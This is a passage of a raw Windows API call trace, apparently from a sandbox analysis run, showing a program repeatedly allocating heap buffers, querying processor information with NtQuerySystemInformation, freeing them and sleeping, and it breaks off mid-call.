[0228.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.876] Sleep (dwMilliseconds=0x110) [0228.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.896] Sleep (dwMilliseconds=0x110) [0228.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.911] Sleep (dwMilliseconds=0x110) [0228.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.925] Sleep (dwMilliseconds=0x110) [0228.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.956] Sleep (dwMilliseconds=0x110) [0228.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.970] Sleep (dwMilliseconds=0x110) [0228.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.992] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.992] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.009] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.010] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.010] Sleep (dwMilliseconds=0x110) [0229.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.023] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.025] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.026] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.026] Sleep (dwMilliseconds=0x110) [0229.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.072] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.072] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.072] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.073] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.073] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.073] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.074] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.074] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.074] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.074] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.074] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.075] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.078] Sleep (dwMilliseconds=0x110) [0229.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.094] Sleep (dwMilliseconds=0x110) [0229.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.111] Sleep (dwMilliseconds=0x110) [0229.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.130] Sleep (dwMilliseconds=0x110) [0229.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.145] Sleep (dwMilliseconds=0x110) [0229.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.165] Sleep (dwMilliseconds=0x110) [0229.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 